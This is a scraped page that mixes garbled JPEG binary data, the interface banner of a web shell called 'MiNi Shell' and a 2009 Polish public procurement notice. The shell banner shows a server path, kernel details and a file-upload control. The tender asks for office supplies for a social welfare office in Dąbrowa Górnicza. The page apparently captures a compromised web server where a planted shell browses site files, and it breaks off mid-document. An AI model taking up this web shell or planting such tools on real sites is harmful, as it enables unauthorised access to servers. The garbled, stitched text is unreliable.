JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090331/85364-N-2009.html

<p class="kh_header"><b>Dąbrowa Górnicza: Dostawa  materiałów biurowych na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej</b><br>
<b>Numer ogłoszenia: 85364 - 2009; data zamieszczenia: 31.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Skibińskiego 1, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2622528, faks 032 2613694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.mops.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  materiałów biurowych na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje: Dostawę  materiałów biurowych na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej 
  ZP-3-26U-MOPS-2009
- zgodnie  z wymogami  określonymi  w niniejszej  Specyfikacji Istotnych Warunków Zamówienia  zwanej dalej SIWZ
  
III.1  Przedmiot zamówienia  oraz ilość i szczegółowy rodzaj asortymentu   określono w kalkulacji cenowej zamówienia publicznego tj. załączniku Nr 2, który stanowi integralną część niniejszej SIWZ oraz  w treści projektu umowy  tj. załącznik nr 4 do niniejszej SIWZ
                                                               
III.2 Wykonawca zagwarantuje dostawy materiałów biurowych własnym środkiem transportu, z dostawą na miejsce  wskazane przez Zamawiającego, terminowo w dniu  i godzinie  uprzednio uzgodnionym  z właściwym   pracownikiem  MOPS, na własny koszt, zachowując  ceny ofertowe 

III.3	Dostarczony towar winien być  zapakowany oddzielnie asortymentowo  i opisany zgodnie z pozycjami kalkulacji tj. załącznik nr 2 do niniejszej specyfikacji i umowy
III.4    Dostarczony  towar  niezgodny  z zapotrzebowaniem , wadliwy  lub przeterminowany  będzie zwracany

III.5   Zamawiający zastrzega sobie  prawo do rezygnacji lub zmiany  poszczególnego asortymentu wyszczególnionego w załączniku nr 2 tj. Kalkulacji cenowej w ramach ceny ofertowej  w każdym czasie trwania umowy
1.Antyrama o wymiarach: 21 x 29,7 - . 26szt
2.Antyrama   o wymiarach: 30 x 40.- 18szt
   3.Blok listowny, w kratkę   A-4 (100 kart.)  - 277szt
4.Blok listowny, w kratkę   B-5 (100 kart.) - 242szt
5.Blok do Flip Charte     65 x 100 50 kart; gładki. - 50szt
6.Cienkopisy czarne. Grubość linii 0,4 mm. - 131szt
7.Cienkopisy niebieskie.  Grubość linii 0,4 mm. - 78szt
8.Cienkopisy zielone. Grubość linii 0,4 mm. -78 szt
9.Cienkopis czerwony. Grubość linii 0,4 mm. - 107szt
10.Dyskietki op=10szt. - 46op.
11.Dysk CD-R 700 MB 52X. - 49szt
12.Dysk DVD-RW 4,7 GB 4 x slim. - 20szt
13.Długopis na sprężynce samoprzylepna podstawka możliwość umocowania w pozycji pionowej lub poziomej rozciągliwa sprężynka do 1 metra, wymienny wkład. -20 szt
14.Długopis automatyczny   z wymiennym wkładem, obudowa z wytrzymałego aluminium, podgumowy uchwyt, długość pisania: 800 m, grubość linii: 0,7 mm. - 256szt
15.Wkłady do długopisu j.w niebieskie -506 szt
16.Wkłady do długopisu j.w czarne - 20szt
17.Długopis chiński - 130szt
18.Wkłady do długopisu chińskiego - 133szt
19.Długopis niebieski zwykły  z wymiennym wkładem -282 szt
20.Wkłady do długopisu j.w. -375 szt
   21.Długopis automatyczny żelowy niebieski z wymiennym wkładem. Zaopatrzony  w igłową końcówkę piszącą. Grubość linii pisania 0,3 mm. Długość linii :  600 m Przezroczysta obudowa, gumowy uchwyt - 86szt
22.Wkłady do długopisu żelowego j.w. - 150szt
23.Długopis automatyczny żelowy czarny z wymiennym wkładem. Zaopatrzony w igłową końcówkę piszącą.  Grubość linii pisania 0,3 mm. Długość linii: 600 m. Przezroczysta obudowa, gumowy uchwyt - 120szt
24.Wkłady do długopisu j.w. - 157szt
25.Długopis automatyczny żelowy zielony z wymiennym wkładem. Zaopatrzony w igłową końcówkę piszącą. Grubość linii pisania 0,3 mm. Długość linii : 600 m. Przezroczysta obudowa, gumowy uchwyt.. -48 szt.
26.Wkłady do długopisu j.w. - 39szt.
27.Długopis automatyczny żelowy czerwony z wymiennym wkładem. Zaopatrzony w igłową końcówkę piszącą. Grubość linii pisania 0,3 mm. Długość linii : 600 m. Przezroczysta obudowa, gumowy uchwyt - 66szt.
28.Wkłady do długopisu j.w. - 76szt.
29.Dziurkacz metalowy. Dziurkujący do 30 kartek. Wymiary 115x96x82 mm. -32 szt.
30.Dziurkacz metalowy. Dziurkujący do 40 kartek. Wymiary 120x124x118 mm. - 16szt
31.Folia samoprzylepna kolorowa format B1 70x100 cm.-.jn.
.   Biały - 5ark.
.   Żółty -5 ark.
.   Pomarańczowy  - 5ark.
.   Czerwony - 5ark.
.   Zielony -5 ark.
.   Błękitny - 5ark.
.   Granatowy - 4ark.
.   Zielony jasny - 4ark.
.   Zielony ciemny -4 ark.
.   Czarny - 4ark.
32.Gumka o wymiarach :  54x 23x13mm do usuwania zapisów naniesionych ołówkiem lub długopisem nie niszcząca papieru podczas ścierania umożliwiająca delikatne i czyste wymazywanie - 66szt
33.Grzbiety plastikowe do bindownicy 8 mm niebieskie   op = 100 szt  - 2op.
34.Grzbiety plastikowe do bindownicy 10 mm niebieskie. op = 100 szt  -1 op.
35.Grzbiety plastikowe do bindownicy 12 mm niebieskie op = 100 szt  - 2op.
36.Grzbiety plastikowe do bindownicy 16 mm niebieskie op = 100 szt  - 1op.
37.Grzbiety plastikowe do bindownicy 20 mm niebieskie op = 100 szt  - 1op.
38.Grafity B 0,7 op=20 szt.- 4 op.
39.Kalka kopiująca maszynowa   A-4 op=50 szt. - 5op
40.Kalka kreślarska w bloku A-4 op=30 szt - 2op
41.Klej biurowy w sztyfcie 21g.- 68szt.
42.Klej biurowy w tubce 50 ml. - 45szt
43.Klip do dokumentów 19 mm, wykonany z metalu z  procesem galwanizacji. op=12 szt. -3 op.
44.Klip do dokumentów 25 mm, wykonany z metalu z  procesem galwanizacji.  op=12 szt.- 3op.
45.Klip do dokumentów 32 mm, wykonany z metalu z  procesem galwanizacji.    op=12 szt.- 3 op.
46.Klip do dokumentów 41 mm, wykonany z metalu z  procesem galwanizacji. op=12 szt.- 3op.
47.Klip do dokumentów 51 mm, wykonany z metalu z  procesem galwanizacji.   op=12 szt.- 3 op.
48.Koperty białe samoprzylepna  C-6 op=1000 szt  wymiary:114 x 162 mm. - 25op.
  49.Koperta białe samoprzylepna  C-4 op= 250 szt  wymiary:229 x 324 mm  - 24op.
50.Koperta biała samoprzylepna  B-5 op= 500 szt  wymiary:176 x 250 mm.- 18op.
51.Koperta biała samoprzylepna wymiary:110 x 220 mm    z okienkiem prawym    o wymiarach: 45x90 mm  op=1000 szt.- 32op.
52.Korektor z gąbką   pojemność  20 ml, bezzapachowy i odporny na światło.- 5szt.
53.Koszulki foliowe A-4  op=100 szt.  Otwierane od góry multiperforowane, umożliwiające wpięcie do każdego segregatora - 103op.
54.Kalkulator nie gorszy niż Vector CD - 1181 biurowy  wymiary:151x120x20 mm, 10 pozycyjny  wyświetlacz, funkcja check i correct -  32 kroki przeglądania i korekty, obliczanie marży, zaokrąglanie wyników - 22szt
55.Kalkulator  nie gorszy niż CITIZEN 355 DP III z drukarką, z zasilaczem do prądu wymiary:300x260x73 mm  - 3szt
56.Karton kolorowy format B1 70 x 100 cm. jn.
Żółty. - 5ark.
Kanarkowy.- 5ark.
Pomarańczowy - 5ark.
Czerwony -5 ark.
Różowy - 5ark.
Błękitny - 5ark.
Zielony jasny -5 ark.
Zielony ciemny - 5ark.
Granatowy - 5ark.
Czarny -5 ark.
57.Linijka 20 cm, plastikowa. Przeźroczysta   z wyraźnym nadrukiem podziałki  - 3szt.
58.Linijka 30 cm, plastikowa. Przeźroczysta z wyraźnym nadrukiem podziałki  -36 szt.
59.Linijka 50 cm, plastikowa. Przeźroczysta z wyraźnym nadrukiem podziałki - 1szt.
60.Marker permanentny z końcówką ściętą.  Grubość od 1-5 mm   (czarny )  - 110szt.
61.Marker permanentny z końcówka ściętą. Grubość od 1-5 mm.    (niebieski)- 91szt
62.Marker permanentny z końcówką ściętą. Grubość od 1-5 mm ( zielony )- 93szt
63.Marker permanentny  z końcówką ściętą. Grubość od 1-5 mm (czerwony) - 85szt
64. Marker permamentny do CD, DVD (czarny) Grubość linii 0,6 mm.- 3szt
65.Naklejki do segregatora na grzbiet 70 mm - 410szt
66.Notes samoprzylepny 76mm -76mm,  karteczki klejone wzdłuż jednego boku, żółte ilość kartek w bloczku =100 szt - 309bl.
67.Notes skręcony z kolorowymi kartkami. Karteczki klejone wzdłuż jednego boku- 77 szt
68.Nożyczki metalowe, z nierdzewnej stali roz. 17cm.  - 50szt
69.Niszczarka nie gorsza niż Fellowes DS - 1 Safe Sense Niszcząca dokumenty z zszywkami i małymi spinaczami. Wyposażona   w unikalny czujnik bezpieczeństwa, zabezpieczenie termiczne przed przegrzaniem, metalowy kosz, automatyczne zatrzymanie pracy przy wyjętym koszu. Szerokość wyjścia (mm) 230, szerokość cięcia (mm) 3,9x35, poziom bezpieczeństwa 3, wydajność ark. A-4 - 70 kg, objętość pojemnika (litry) 18  - 1szt
70.Ofertówka sztywna A-4, wykonana z twardej foli (180 mic) PCV. Otwierana u góry z prawej strony, zaokrąglone rogi, zgrzewane na lewym grzbiecie  i dolnej krawędzi. op=50 szt. - 20op.
71.Ołówek drewniany o twardości HB. - 188szt
72.Okładka przezroczyste do bindowania op=100 szt.- 10op.
73.Okładka do bindowania kolorowa op=50 szt .-.j.n.
.czerwona.- 4op.
.niebieska.- 4op.
.czarna.- 2op.
74.Pinezki srebne op=50 szt.- 18szt
75.Pinezki do tablicy korkowej, kolorowe op=50 szt.- 49 op.
76.Pióro kulkowe, automatycznie chowany wkład, szybkoschnący tusz pigmentowy, wodoodporny i odporny na blaknięcia - zasychanie w ciągu 1 sekundy, nie rozmazujące się i nie przesiąkające przez papier. Grubość linii pisania:   ok.0,35 mm.- 22szt
77.Wkład do pióra j.w niebieski.- 66 szt
78.Wkład do pióra j.w czarny  - 22szt
79.Poduszka czerwona 90x50 mm.- 9szt
80.Poduszka czerwona  110x70 mm. -2 szt
81.Poduszka czerwona   160x90 mm.- 1szt
82.Przybornik na biurko wielofunkcyjny, prostokątny, dymny. - 22szt
83.Pudełko na dyskietki  (do 50 szt ) - 8szt
84.Pudełko plastik na płyty CD na  20  płyt - 8szt
85.Pudełko plastikowe otwarte na kartoteki wym. 17x32x10,5 cm pion.- 36szt
86.Papier na zaproszenia A-4. W kolorze żółtym piaskowym op=50 ark.- 22op.
87.Rozszywasz, zęby metalowe, uchwyt wykonany z twardego plastiku. - 53 szt
88.Skoroszyt kartonowy biały, pełny oczkowy A-4, o rozstawieniu oczek pasujących do segregatorów  z poz. 92 i 93 op= 50 szt . -261 op.
89.Spinacze biurowe 26 mm  op= 100 szt. - 236op.
90.Spinacze biurowe 50 mm op=100 szt. -54 op.
91.Szuflady plastikowe na dokumenty A-4, biurkowe. - 58szt
92.Segregator A-4,  szer.  grz. 70 mm. Cały marmurek, wykonany   z utwardzonego kartonu  z mechanizmem dźwigowym. Nie brudzący, wzmocniony otwór na palec -600 szt
93.Segregator A-4,   szer. grz 50 mm. Cały marmurek,  wykonany   z utwardzonego kartonu    z mechanizmem dźwigowym. Nie brudzący, wzmocniony otwór na palec. -157 szt
94.Segregator A-4, szer. grz.70 mm Wykonany z tektury pokrytej ekologiczną folią polipropylenową o strukturze płótna. Dwustronna etykieta na grzbiet, wzmocniony otwór na palec. W kolorze niebieskim. - 6szt.
95.Skorowidz alfabetyczny A-4. -7 szt.
96.Skorowidz alfabetyczny na telefony ? A-4. - 20szt.
97.Skoroszyt plastikowy sztywny A -4. Zawieszany do segregatora. Przednia okładka przezroczysta sztywna, druga w kolorze czerwonym, granatowym. - 517szt.
98.Szpilki op=100 szt. -3 op.
99.Taśma Dymo D1 12mm - 7 m, czarno - biała. - 5szt.
100.Taśma barwiąca do kalkulatora 355 DP II. - 5szt.
101.Teczka plastikowa z gumką w formacie A-4, wykonana ze sztywnej folii o prążkowej strukturze, gumki zamykające w kolorze teczki, trzy wewnętrzne skrzydła. Kolor czerwony, niebieski, żółty. -20 szt.
102.Teczka z gumką lakierowana. Wykonana z kartonu o gramaturze kartonu 400g-m2,   w formacie A-4.   Rozmiar: 232x320. -50szt.
103.Teczka z gumką w formacie   A-4 kartonowa 350 g - m2 biała op=50 szt. -75 op.
104.Teczka wiązana w formacie   A-4 kartonowa 350 g -m2 biała op=50 szt. -45 op.
105.Teczka do podpisu harmonijkowe A-4, okładka   z twardego kartonu, (30 kart.). -27 szt.
106.Taśma klejąca bezbarwna       24 mm x 30 m. - s102zt.
107.Taśma klejąca bezbarwna 12 mm x 20 m. -116 szt.
108.Taśma klejąca dwustronna  38 mmx10 m. - 56szt.
109.Taśma gęsia skórka 12mm. -11 szt.
110.Taśma Dalton  szer. 57 mm, dł.25 m. -105 szt.
111.Tusz do pieczątek czerwony   22 ml. -40 szt.
112.Tusz do pieczątek niebieski  22 ml. - 24szt.
113.Tusz do pieczątek  czarny 22 ml. - 2szt.
114.Temperówka metalowa. - 60szt.
115.Tablica korkowa 60x40 cm. - 13szt.
116.Tablica korkowa 90x60 cm. - 12szt.
117.Wkłady do biuwaru. - 133szt.
118.Wałeczek do kalkulatora Citizen IR40T. -9 szt.
119.Wąsy do skoroszytów   op=25 szt różne kolory. - 3op.
120.Zakreślasz  tekstu  o długotrwałym  działaniu, dłużej odporności na wyschnięcie, tusz na bazie wody, miękka płynna linia  o szerokości nie mniej niż  5 mm, ścięta końcówka pisząca natychmiastowa trwała florenscencyjność, kolor zielony, żółty, pomarańczowy. -188 szt.
121.Zwilżacz glicerynowy do palców poj.25 ml. -12 szt.
122.Zakładki indeksujące papierowe o wymiarach: 15 x 50 mm 5 kolorów neon. W opakowaniu 500 szt. zakładek po 100   w kolorze. - 140op.
123.Zeszyt w kratkę A-4 (96 kart.). -200 szt.
124.Zeszyt w kratkę A-4 (96 kart.) w twardej oprawie. -12 szt.
125.Zeszyt w kratkę A-5 (32 kart.). -84 szt.
126.Zeszyt w kratkę A-5 (60 kart.). - 90szt.
127.Zeszyt w kratkę A-5 (96 kart.) 148- szt.
128.Zeszyt w kratkę A-5 (16 kart). -34 szt.
129.Zszywacz metalowy, na zszywki 24 -6, 26 -6. Zszywanie do 20 kartek.    Głębokość zszywania 67 mm.  Wymiary: 131x34x62 mm - 53szt.
130.Zszywacz metalowy, na zszywki 23 -6, 23 -8, 23 -10, 23 -13, 23 -15.   Zszywa od 2 do 100 kartek - 19szt.
131.Zszywki 24- 6 op=1000 szt.- 249 op.
132.Zszywki 23 -13 op=1000 szt. - 55op.
133.Farby plakatowe op=12 kolorów. - 13op.
134.Pisaki cienkie kolorowe   op=12 kolorów - 12op.
135.Blok techniczny A-3  20 kartkowy -5 szt.
136.Blok techniczny A-4 20 kartkowy -5 szt.
137.Pędzelki szkolne.  Trzon wykonany z drewna   z metalowym uchwytem. O różnych wielkościach   i szerokościach kpl=6 szt. -16 kpl.
138.Papier ksero 500 -A-4 -80g -m2 -białość CIA 161. - 2035 ryza.
139.Papier ksero  A-4 kolor 500 -A-4- 80g -m2 .-21 ryza.
140.Baterie alkaiczne R-6.- 20 szt.
141.Baterie alkaiczne R-14.- 6 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.76.44-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia określonego w niniejszej  specyfikacji mogą ubiegać się wykonawcy, którzy:
1.  Spełniają wymagania określone w art. 22 ust. 1  ustawy  z dnia 29 stycznia 2004 r. -  
     Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz.1655 z późn. zm.) 
2.  Nie podlegają wykluczeniu  z postępowania  o udzielenie zamówienia  - art. 24 ust. 1 i 2  
     ustawy Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655  z późn. zm.) 
3.  W okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia , a w przypadku gdy okres  prowadzenia działalności jest krótszy- w tym okresie wykonali, (a w przypadku świadczeń okresowych  lub ciągłych są w trakcie wykonywania) , co najmniej 1 dostawę odpowiadającą swoim rodzajem i wartością dostawie stanowiącej przedmiot zamówienia, której należyte wykonanie zostało potwierdzone przez poprzedniego Zamawiającego. ( minimum 1 referencje lub inny dokument potwierdzający należyte wykonanie zamówienia) 
      Przez dostawę  odpowiadającą swoim rodzajem i wartością przedmiotowi zamówienia  należy rozumieć  minimum jedno zamówienie podobne do przedmiotu zamówienia tj. dostawę materiałów biurowych w okresie ostatnich 3 lat  przed dniem wszczęcia postępowania, a w przypadku gdy okres  prowadzenia działalności jest  krótszy- w tym okresie,  co najmniej 1 zamówienie którego wartość  jest równa lub przekracza kwotę - 40 000,00 zł brutto (w skali zamówienia).

Ocena spełnienia  warunków - udziału  w postępowaniu  ( formalnych)  i zdolności  do wykonania  zamówienia ( merytorycznych)  - wymaganych   od Wykonawców  dokonywana będzie  w oparciu  o złożone wraz z ofertą  oświadczenia o spełnieniu  warunków  udziału  w postępowaniu  o udzielenie zamówienia  publicznego  i   dokumenty  potwierdzające  spełnienie tych warunków według  formuły spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie  spełnienia warunków  (formalnych) i zdolności  do wykonania  zamówienia ( merytorycznych) udziału w postępowaniu  Wykonawca jest zobowiązany  złożyć :

1. Aktualny  odpis  z właściwego rejestru lub aktualne  zaświadczenie  o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej  niż  6 miesięcy  przed upływem terminu składania ofert.

2. Oświadczenie stwierdzające, że Wykonawca spełnia wymagania określone w art. 22 ust.1oraz nie podlega wykluczeniu  z art.  24 ust 1 i 2 ustawy   Prawo zamówień publicznych  z dnia 29 stycznia 2004 r. W przypadku składania ofert przez  Wykonawców występujących wspólnie, oświadczenie winno być  podpisane na jednym druku  przez  każdego z ubiegających się  o udzielenie zamówienia  wykonawców    - wg wzoru - zał. nr 3 - wskazana aktualna data podpisania dokumentu. 

3. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych wykonywanych    dostaw  w okresie  ostatnich trzech lat  przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego , a jeżeli okres  prowadzenia działalności  jest krótszy - w tym okresie,  odpowiadających swoim rodzajem  i wartością  dostawom  stanowiącym  przedmiot zamówienia z podaniem ich wartości , przedmiotu , dat wykonania i odbiorców, oraz załączeniu dokumentów potwierdzających, że te dostawy zostały wykonane należycie- co najmniej 1 referencja , opinia lub inny dokument potwierdzający wykonanie dostawy, której wartość  jest równa lub przekracza kwotę - 40 000,00 zł. (w skali zamówienia). - załącznik nr 5

3. Wypełniony formularz kalkulacji  cenowej - załącznik nr 2 - wskazana aktualna data podpisania dokumentu.

4. Wypełniony  formularz  ofertowy wykonany według wzoru Zamawiającego ( zał. nr 1 ) Wymagana jest oferta wykonana na lub wg ścisłego wzoru Zamawiającego. - wskazana aktualna data podpisania dokumentu.

5.  Zaparafowany  przez Wykonawcę projekt  umowy (załącznik nr  4),   potwierdzający przyjęcie warunków załączonego wzoru umowy.

6. Do oferty należy załączyć: Pełnomocnictwo  do reprezentowania Wykonawcy, jeżeli zostało ono ustanowione  lub  do reprezentowania Wykonawców  wspólnie ubiegających się  o zamówienie, przedłożone  w formie oryginału  lub kopii poświadczonej  przez notariusza.

7. Upoważnienie do podpisywania  ofert i występowania  w przetargu  w imieniu wykonawcy musi być dołączone  do oferty  lub musi   bezpośrednio wynikać  z przedstawionych dokumentów. Gdy wykonawcę reprezentuje pełnomocnik  do oferty musi być załączone  pełnomocnictwo posiadające zakres i podpisane przez osobę(y)  reprezentującą(e) osobę(y)  prawną(e) lub fizyczną(e)  lub kopię poświadczoną  za zgodność z oryginałem przez notariusza.

Uwagi:
1. Dokumenty określone w  rozdz. VI. pkt 1,2  wymagane są w celu potwierdzenia warunku, że  Wykonawca posiada uprawnienia do wykonania określonej działalności  lub czynności  oraz nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.

2. Zamawiający  zgodnie  z art. 26 ust. 3 uPzp wzywa Wykonawców, którzy w określonym terminie nie złożyli wymaganych  przez Zamawiającego oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub którzy nie złożyli pełnomocnictw , albo którzy złożyli  wymagane przez Zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa , do ich  złożenia  w wyznaczonym  terminie, chyba  że  mimo ich złożenia   oferta wykonawcy podlega odrzuceniu albo  konieczne byłoby unieważnienie postępowania. Złożone  na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać  spełnienie przez Wykonawcę  warunków udziału  w postępowaniu oraz spełnienie przez oferowane dostawy wymagań określonych przez Zamawiającego, nie później  niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie  do udziału w postępowaniu albo termin składania ofert.
 
3. Zamawiający wzywa także , w wyznaczonym  przez siebie terminie , do złożenia wyjaśnień dotyczących  oświadczeń lub  dokumentów o których mowa w rozdz. VI niniejszej SIWZ.

4. Dokumenty o których mowa wyżej  mogą być złożone w formie  oryginału  lub kopii  poświadczonej za  zgodność z oryginałem  przez  osobę (y)  uprawnione  do podpisywania oferty.


5. Zamawiający może  żądać  przedstawienia oryginału  lub notarialnie  poświadczonej kopii  dokumentu wyłącznie  wtedy, gdy  złożona przez Wykonawcę  kopia dokumentu  jest nieczytelna  lub budzi wątpliwości, co do prawdziwości.
6. Jeżeli wykonawca  ma siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej Polskiej:
